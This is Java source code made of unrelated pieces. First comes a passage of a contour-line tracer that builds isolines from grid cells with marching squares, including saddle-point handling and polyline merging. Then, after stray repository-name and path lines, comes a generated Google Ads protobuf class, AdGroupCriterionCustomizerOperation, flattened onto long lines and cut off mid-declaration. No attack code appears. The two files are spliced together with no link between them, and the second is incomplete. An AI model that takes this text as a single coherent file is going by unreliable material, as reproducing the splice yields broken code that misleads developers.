         * @see #closeLeftWithTop(PolylineBuffer)
         */
        private final Map<Point,Fragments> partialPaths;

        /**
         * Builder of isolines as a Java2D shape, created when first needed.
         * The {@link PolylineBuffer} coordinates are copied in this path when a geometry is closed
         * and transformed using {@link #gridToCRS}. This is almost final result; the only difference
         * compared to {@link #shape} is that the coordinates are not yet wrapped in a {@link Shape}.
         *
         * @see #writeTo(Joiner, PolylineBuffer[], boolean)
         * @see PolylineStage#FINAL
         */
        private Joiner path;

        /**
         * The isolines as a Java2D shape, created by {@link #finish()}.
         * This is the shape to be returned to user for this level after we finished to process all cells.
         *
         * @see PolylineStage#FINAL
         */
        Shape shape;

        /**
         * Creates new isoline levels for the given value.
         *
         * @param  band   band number where to read values in the {@link #window} array.
         * @param  value  the isoline level value.
         * @param  width  the contouring grid cell width (one cell smaller than image width).
         */
        Level(final int band, final double value, final int width) {
            this.band  = band;
            this.value = value;
            partialPaths   = new HashMap<>();
            polylineOnLeft = new PolylineBuffer();
            polylinesOnTop = new PolylineBuffer[width];
            for (int i=0; i<width; i++) {
                polylinesOnTop[i] = new PolylineBuffer();
            }
        }

        /**
         * Initializes the {@link #isDataAbove} value with values for the column on the right side.
         * After this method call, the {@link #UPPER_RIGHT} and {@link #LOWER_RIGHT} bits still need to be set.
         *
         * @see Isolines#setMaskBit(double, int)
         */
        final void nextColumn() {
            /*
             * Move bits on the right side to the left side.
             * The 1 operand in >>> is the hard-coded value
             * of log2(UPPER_RIGHT) - log2(UPPER_LEFT)
             * and log2(LOWER_RIGHT) - log2(LOWER_LEFT).
             */
            isDataAbove = (isDataAbove & (UPPER_RIGHT | LOWER_RIGHT)) >>> 1;
        }

        /**
         * Adds segments computed for values in a single pixel. Interpolations are determined by the 4 lowest bits
         * of {@link #isDataAbove}. The {@link #polylineOnLeft} and {@code polylinesOnTop[x]} elements are updated
         * by this method.
         *
         * <h4>How NaN values are handled</h4>
         * This algorithm does not need special attention for {@link Double#NaN} values. Interpolations will produce
         * {@code NaN} values and append them to the correct polyline (which does not depend on interpolation result)
         * like real values. Those NaN values will be filtered later in another method, when copying coordinates in
         * the {@link PathBuilder}.
         */
        @SuppressWarnings("AssertWithSideEffects")
        final void interpolate() throws TransformException {
            /*
             * Note: `interpolateMissingLeftSide()` and `interpolateMissingTopSide(…)` should do interpolations
             * only for cells in the first column and first row respectively. We could avoid those method calls
             * for all other cells if we add two flags in the `isDataAbove` bitmask: FIRST_ROW and FIRST_COLUMN.
             * The switch cases then become something like below:
             *
             *     case <bitmask> | FIRST_COLUMN | FIRST_ROW:
             *     case <bitmask> | FIRST_COLUMN: {
             *         interpolateMissingLeftSide();
             *         // Fall through
             *     }
             *     case <bitmask> | FIRST_ROW:
             *     case <bitmask>: {
             *         // Interpolations on other borders.
             *         break;
             *     }
             *
             * We tried that approach, but benchmarking on Java 15 suggested a small performance decrease
             * instead of an improvement. It may be worth to try again in the future, after advancement
             * in compiler technology.
             */
            switch (isDataAbove) {
                default: {
                    throw new AssertionError(isDataAbove);      // Should never happen.
                }
                /*     ○╌╌╌╌╌╌○        ●╌╌╌╌╌╌●
                 *     ╎      ╎        ╎      ╎
                 *     ╎      ╎        ╎      ╎
                 *     ○╌╌╌╌╌╌○        ●╌╌╌╌╌╌●
                 */
                case 0:
                case UPPER_LEFT | UPPER_RIGHT | LOWER_LEFT | LOWER_RIGHT: {
                    assert polylinesOnTop[x].isEmpty();
                    assert polylineOnLeft   .isEmpty();
                    break;
                }
                /*     ○╌╌╌╌╌╌○        ●╌╌╌╌╌╌●
                 *    ─┼──────┼─      ─┼──────┼─
                 *     ╎      ╎        ╎      ╎
                 *     ●╌╌╌╌╌╌●        ○╌╌╌╌╌╌○
                 */
                case LOWER_LEFT | LOWER_RIGHT:
                case UPPER_LEFT | UPPER_RIGHT: {
                    assert polylinesOnTop[x].isEmpty();
                    interpolateMissingLeftSide();
                    interpolateOnRightSide();                   // Will be the left side of next column.
                    break;
                }
                /*     ○╌╌╌┼╌╌●        ●╌╌╌┼╌╌○
                 *     ╎   │  ╎        ╎   │  ╎
                 *     ╎   │  ╎        ╎   │  ╎
                 *     ○╌╌╌┼╌╌●        ●╌╌╌┼╌╌○
                 */
                case UPPER_RIGHT | LOWER_RIGHT:
                case UPPER_LEFT  | LOWER_LEFT: {
                    assert polylineOnLeft.isEmpty();
                    final PolylineBuffer polylineOnTop = polylinesOnTop[x];
                    interpolateMissingTopSide(polylineOnTop);
                    interpolateOnBottomSide(polylineOnTop);     // Will be top side of next row.
                    break;
                }
                /*    ╲○╌╌╌╌╌╌○       ╲●╌╌╌╌╌╌●
                 *     ╲      ╎        ╲      ╎
                 *     ╎╲     ╎        ╎╲     ╎
                 *     ●╌╲╌╌╌╌○        ○╌╲╌╌╌╌●
                 */
                case LOWER_LEFT:
                case UPPER_LEFT | UPPER_RIGHT | LOWER_RIGHT: {
                    assert polylinesOnTop[x].isEmpty();
                    interpolateMissingLeftSide();
                    interpolateOnBottomSide(polylinesOnTop[x].transferFrom(polylineOnLeft));
                    break;
                }
                /*     ○╌╌╌╌╲╌●        ●╌╌╌╌╲╌○
                 *     ╎     ╲╎        ╎     ╲╎
                 *     ╎      ╲        ╎      ╲
                 *     ○╌╌╌╌╌╌○╲       ●╌╌╌╌╌╌●╲
                 */
                case UPPER_RIGHT:
                case UPPER_LEFT | LOWER_LEFT | LOWER_RIGHT: {
                    assert polylineOnLeft.isEmpty();
                    interpolateMissingTopSide(polylineOnLeft.transferFrom(polylinesOnTop[x]));
                    interpolateOnRightSide();
                    break;
                }
                /*     ○╌╌╌╌╌╌○╱       ●╌╌╌╌╌╌●╱
                 *     ╎      ╱        ╎      ╱
                 *     ╎     ╱╎        ╎     ╱╎
                 *     ○╌╌╌╌╱╌●        ●╌╌╌╌╱╌○
                 */
                case LOWER_RIGHT:
                case UPPER_LEFT | UPPER_RIGHT | LOWER_LEFT: {
                    assert polylinesOnTop[x].isEmpty();
                    assert polylineOnLeft   .isEmpty();
                    interpolateOnRightSide();
                    interpolateOnBottomSide(polylinesOnTop[x].attach(polylineOnLeft));
                    // Bottom of this cell will be top of next row.
                    break;
                }
                /*     ●╌╱╌╌╌╌○        ○╌╱╌╌╌╌●
                 *     ╎╱     ╎        ╎╱     ╎
                 *     ╱      ╎        ╱      ╎
                 *    ╱○╌╌╌╌╌╌○       ╱●╌╌╌╌╌╌●
                 */
                case UPPER_LEFT:
                case UPPER_RIGHT | LOWER_LEFT | LOWER_RIGHT: {
                    closeLeftWithTop(polylinesOnTop[x]);
                    break;
                }
                /*     ○╌╱╌╌╌╌●╱      ╲●╌╌╌╌╲╌○
                 *     ╎╱     ╱        ╲     ╲╎
                 *     ╱     ╱╎        ╎╲     ╲
                 *    ╱●╌╌╌╌╱╌○        ○╌╲╌╌╌╌●╲
                 *
                 * Disambiguation of saddle points: use the average data value for the center of the cell.
                 * If the estimated center value is greater than the isoline value, the above drawings are
                 * okay and we do not need to change `isDataAbove`. This is the left side illustrated below.
                 * But if the center value is below isoline value, then we need to flip `isDataAbove` bits
                 * (conceptually; not really because we need to keep `isDataAbove` value for next iteration).
                 * This is the right side illustrated below.
                 *
                 *     ○╱╌╌●╱      ╲●╌╌╲○                        ╲○╌╌╲●      ●╱╌╌○╱
                 *     ╱ ● ╱        ╲ ● ╲                         ╲ ○ ╲      ╱ ○ ╱
                 *    ╱●╌╌╱○        ○╲╌╌●╲                        ●╲╌╌○╲    ╱○╌╌╱●
                 */
                case UPPER_RIGHT | LOWER_LEFT:
                case UPPER_LEFT | LOWER_RIGHT: {
                    double average = 0;
                    {   // Compute sum of 4 corners.
                        final double[] data = window;
                        int p = band;
                        do average += data[p];
                        while ((p += pixelStride) < data.length);
                        assert (p -= band) == pixelStride * 4 : p;
                        average /= 4;
                    }
                    boolean LLtoUR = isDataAbove == (LOWER_LEFT | UPPER_RIGHT);
                    LLtoUR ^= (average <= value);
                    final PolylineBuffer polylineOnTop = polylinesOnTop[x];
                    if (LLtoUR) {
                        closeLeftWithTop(polylineOnTop);
                        interpolateOnRightSide();
                        interpolateOnBottomSide(polylineOnTop.attach(polylineOnLeft));
                    } else {
                        interpolateMissingLeftSide();
                        final PolylineBuffer swap = new PolylineBuffer().transferFrom(polylineOnTop);
                        interpolateOnBottomSide(polylineOnTop.transferFrom(polylineOnLeft));
                        interpolateMissingTopSide(polylineOnLeft.transferFrom(swap));
                        interpolateOnRightSide();
                    }
                    break;
                }
            }
        }

        /**
         * Appends to {@link #polylineOnLeft} a point interpolated on the left side if that point is missing.
         * This interpolation should happen only in the first column.
         */
        private void interpolateMissingLeftSide() {
            if (polylineOnLeft.size == 0) {
                polylineOnLeft.append(translateX + (x),
                                      translateY + (y + interpolate(0, 2*pixelStride)));
            }
        }

        /**
         * Appends to {@code polylineOnTop} a point interpolated on the top side if that point is missing.
         * This interpolation should happen only in the first row.
         */
        private void interpolateMissingTopSide(final PolylineBuffer polylineOnTop) {
            if (polylineOnTop.size == 0) {
                interpolateOnTopSide(polylineOnTop);
            }
        }

        /**
         * Appends to the given polyline a point interpolated on the top side.
         */
        private void interpolateOnTopSide(final PolylineBuffer appendTo) {
            appendTo.append(translateX + (x + interpolate(0, pixelStride)),
                            translateY + (y));
        }

        /**
         * Appends to {@link #polylineOnLeft} a point interpolated on the right side.
         * The polyline on right side will become {@code polylineOnLeft} in next column.
         */
        private void interpolateOnRightSide() {
            polylineOnLeft.append(translateX + (x + 1),
                                  translateY + (y + interpolate(pixelStride, 3*pixelStride)));
        }

        /**
         * Appends to the given polyline a point interpolated on the bottom side.
         * The polyline on top side will become a {@code polylineOnBottom} in next row.
         */
        private void interpolateOnBottomSide(final PolylineBuffer polylineOnTop) {
            polylineOnTop.append(translateX + (x + interpolate(2*pixelStride, 3*pixelStride)),
                                 translateY + (y + 1));
        }

        /**
         * Interpolates the position where the isoline passes between two values.
         *
         * @param  i1  index of first value in the buffer, ignoring band offset.
         * @param  i2  index of second value in the buffer, ignoring band offset.
         * @return a value interpolated between the values at the two given indices.
         */
        private double interpolate(final int i1, final int i2) {
            final double[] data = window;
            final int p = band;
            final double v1 = data[p + i1];
            final double v2 = data[p + i2];
            return (value - v1) / (v2 - v1);
        }

        /**
         * Joins {@link #polylineOnLeft} with {@code polylineOnTop}, saves their coordinates
         * and clear those {@link PolylineBuffer} instances for use in next cell.
         * The coordinates are written directly to {@link #path} if we got a closed polygon,
         * or otherwise are saved in {@link #partialPaths} for later processing.
         * This method is invoked for cells like below:
         *
         * <pre class="text">
         *     ●╌╱╌╌╌╌○        ○╌╱╌╌╌╌●        ○╌╱╌╌╌╌●╱
         *     ╎╱     ╎        ╎╱     ╎        ╎╱     ╱
         *     ╱      ╎        ╱      ╎        ╱     ╱╎
         *    ╱○╌╌╌╌╌╌○       ╱●╌╌╌╌╌╌●       ╱●╌╌╌╌╱╌○</pre>
         *
         * This method does itself the interpolations on left side and top side. The two polylines
         * {@link #polylineOnLeft} and {@code polylineOnTop} will become empty after this method call.
         *
         * @param  polylineOnTop  value of {@code polylinesOnTop[x]}.
         * @throws TransformException if the {@link Tracer#gridToCRS} transform cannot be applied.
         */
        private void closeLeftWithTop(final PolylineBuffer polylineOnTop) throws TransformException {
            interpolateMissingLeftSide();
            interpolateMissingTopSide(polylineOnTop);
            final PolylineBuffer[] polylines;
            if (polylineOnLeft.opposite == polylineOnTop) {
                assert polylineOnTop.opposite == polylineOnLeft;
                /*
                 * We have a loop: the polygon can be closed now, without copying coordinates to temporary buffers.
                 * Points in `PolylineBuffer` instances will be iterated in (reverse, forward) order respectively.
                 * Consequently, the points we just interpolated will be first point and last point before closing.
                 */
                polylines = new PolylineBuffer[] {polylineOnTop, polylineOnLeft};    // (reverse, forward) point order.
            } else {
                /*
                 * Joining left and top polylines does not yet create a closed shape. Consequently, we may not write
                 * in the `path` now. But maybe we can close the polygon later after more polylines are attached.
                 */
                final Fragments fragment = new Fragments(polylineOnLeft, polylineOnTop);
                if (fragment.isEmpty()) {
                    /*
                     * Fragment starts and ends with NaN values. We will not be able to complete a polygon.
                     * Better to write the polylines now for avoiding temporary copies of their coordinates.
                     */
                    polylines = new PolylineBuffer[] {
                        polylineOnLeft.opposite, polylineOnLeft,
                        polylineOnTop, polylineOnTop.opposite
                    };
                } else if (fragment.addOrMerge(partialPaths)) {
                    /*
                     * The fragment has been merged with previously existing fragments and became a polygon.
                     * We can write the polygon immediately. There are no more references to those coordinates
                     * in the `partialPaths` map.
                     */
                    polylines = fragment.toPolylines();
                } else {
                    return;
                }
            }
            path = writeTo(path, polylines, true);
        }

        /**
         * Writes the content of given polyline without closing it as a polygon.
         * The given polyline will become empty after this method call.
         */
        private void writeFragment(final PolylineBuffer polyline) throws TransformException {
            final Fragments fragment = new Fragments(polyline, null);
            final PolylineBuffer[] polylines;
            final boolean close;
            if (fragment.isEmpty()) {
                close = false;
                polylines = new PolylineBuffer[] {polyline.opposite, polyline};      // (reverse, forward) point order.
            } else {
                close = fragment.addOrMerge(partialPaths);
                if (!close) {
                    // Keep in `partialPaths`. Maybe it can be closed later.
                    return;
                }
                polylines = fragment.toPolylines();
            }
            path = writeTo(path, polylines, close);
        }

        /**
         * Invoked after iteration on a single row has been completed. If there is a polyline
         * finishing on the right image border, the coordinates need to be saved somewhere
         * because that {@link PolylineBuffer} will not be continued by cells on next rows.
         */
        final void finishedRow() throws TransformException {
            if (!polylineOnLeft.transferToOpposite()) {
                writeFragment(polylineOnLeft);
            }
            isDataAbove = 0;
        }

        /**
         * Invoked after the iteration has been completed on the full area of interest.
         * This method writes all remaining polylines to {@link #partialPaths}.
         * It assumes that {@link #finishedRow()} has already been invoked.
         * This {@link Level} instance cannot be used anymore after this call.
         */
        final void finish() throws TransformException {
            assert polylineOnLeft.isEmpty();
            polylineOnLeft.coordinates = null;
            /*
             * This method sets various values to null for letting the garbage collector do its work.
             * This is okay for a `Level` instance which is not going to be used anymore, except for
             * reading the `shape` field.
             */
            for (int i=0; i < polylinesOnTop.length; i++) {
                writeFragment(polylinesOnTop[i]);
                polylinesOnTop[i] = null;
            }
            assert isConsistent();
        }

        /**
         * Verifies the {@link #partialPaths} consistency. Used for assertions only.
         */
        private boolean isConsistent() {
            for (final Map.Entry<Point,Fragments> entry : partialPaths.entrySet()) {
                if (!entry.getValue().isExtremity(entry.getKey())) return false;
            }
            return true;
        }

        /**
         * Transfers all {@code other} polylines into this instance. The {@code other} instance should be a neighbor,
         * i.e. an instance sharing a border with this instance. The {@code other} instance will become empty after
         * this method call.
         *
         * @param  other  a neighbor level (on top, left, right or bottom) to merge with this level.
         * @throws TransformException if an error occurred during polylines creation.
         */
        final void merge(final Level other) throws TransformException {
            assert other != this && other.value == value;
            if (path == null) {
                path = other.path;
            } else {
                path.append(other.path);
            }
            other.path = null;
            assert this .isConsistent();
            assert other.isConsistent();
            final IdentityHashMap<Fragments,Boolean> done = new IdentityHashMap<>(other.partialPaths.size() / 2);
            for (final Map.Entry<Point,Fragments> entry : other.partialPaths.entrySet()) {
                final Fragments fragment = entry.getValue();
                if (done.put(fragment, Boolean.TRUE) == null) {
                    assert fragment.isExtremity(entry.getKey());
                    if (fragment.addOrMerge(partialPaths)) {
                        path = writeTo(path, fragment.toPolylines(), true);
                        fragment.clear();
                    }
                }
                entry.setValue(null);           // Let the garbage collector do its work.
            }
        }

        /**
         * Flushes any pending {@link #partialPaths} to {@link #path}. This method is invoked after
         * {@link #finish()} has been invoked for all sub-regions (many sub-regions may exist if
         * isoline generation has been split for parallel computation).
         *
         * @throws TransformException if an error occurred during polylines creation.
         */
        final void flush() throws TransformException {
            for (final Map.Entry<Point,Fragments> entry : partialPaths.entrySet()) {
                final Fragments fragment = entry.getValue();
                assert fragment.isExtremity(entry.getKey());
                if (!fragment.isEmpty()) {
                    path = writeTo(path, fragment.toPolylines(), false);
                    fragment.clear();           // Necessary because the same list appears twice in the map.
                }
                entry.setValue(null);           // Let the garbage collector do its work.
            }
            if (path != null) {
                shape = path.build();
                path  = null;
            }
        }

        /**
         * Appends the pixel coordinates of this level to the given path, for debugging purposes only.
         * The {@link #gridToCRS} transform is <em>not</em> applied by this method.
         * For avoiding confusing behavior, that transform should be null.
         *
         * @param  appendTo  where to append the coordinates.
         *
         * @see Isolines#toRawPath()
         */
        @Debug
        final void toRawPath(final Map<PolylineStage,Path2D> appendTo) {
            PolylineStage.FINAL.add(appendTo, (path != null) ? path.snapshot() : shape);
            PolylineStage.FRAGMENT.add(appendTo, partialPaths);
            polylineOnLeft.toRawPath(appendTo);
            for (final PolylineBuffer p : polylinesOnTop) {
                if (p != null) p.toRawPath(appendTo);
            }
        }
    }

    /**
     * Writes all given polylines to the specified path builder. Null {@code PolylineBuffer} instances are ignored.
     * {@code PolylineBuffer} instances at even index are written with their points in reverse order.
     * All given polylines are cleared by this method.
     *
     * @param  path       where to write the polylines, or {@code null} if not yet created.
     * @param  polylines  the polylines to write.
     * @param  close      whether to close the polygon.
     * @return the given path builder, or a newly created builder if the argument was null.
     * @throws TransformException if the {@link #gridToCRS} transform cannot be applied.
     */
    private Joiner writeTo(Joiner path, final PolylineBuffer[] polylines, final boolean close) throws TransformException {
        for (int pi=0; pi < polylines.length; pi++) {
            final PolylineBuffer p = polylines[pi];
            if (p == null) {
                continue;
            }
            final int size = p.size;
            if (size == 0) {
                assert p.isEmpty();
                continue;
            }
            if (path == null) {
                path = new Joiner(gridToCRS);
            }
            path.append(p.coordinates, size, (pi & 1) == 0);
            p.clear();
        }
        if (path != null) {
            path.createPolyline(close);
        }
        return path;
    }
}
googleads/google-ads-java
35,915
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/AdGroupCriterionCustomizerOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/ad_group_criterion_customizer_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation} */ public final class AdGroupCriterionCustomizerOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) AdGroupCriterionCustomizerOperationOrBuilder { private static final long serialVersionUID = 0L; // Use AdGroupCriterionCustomizerOperation.newBuilder() to construct. private AdGroupCriterionCustomizerOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdGroupCriterionCustomizerOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new AdGroupCriterionCustomizerOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.Builder.class); } private int operationCase_ = 0; 
@SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { CREATE(1), REMOVE(2), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return CREATE; case 2: return REMOVE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int CREATE_FIELD_NUMBER = 1; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer getCreate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } public static final int REMOVE_FIELD_NUMBER = 2; /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. 
*/ public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, operation_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v19.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, operation_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation)) { return super.equals(obj); } com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation other = (com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) obj; if (!getOperationCase().equals(other.getOperationCase())) return false; 
switch (operationCase_) { case 1: if (!getCreate() .equals(other.getCreate())) return false; break; case 2: if (!getRemove() .equals(other.getRemove())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); switch (operationCase_) { case 1: hash = (37 * hash) + CREATE_FIELD_NUMBER; hash = (53 * hash) + getCreate().hashCode(); break; case 2: hash = (37 * hash) + REMOVE_FIELD_NUMBER; hash = (53 * hash) + getRemove().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom(byte[] data) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation) com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v19_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.AdGroupCriterionCustomizerOperation.class, 
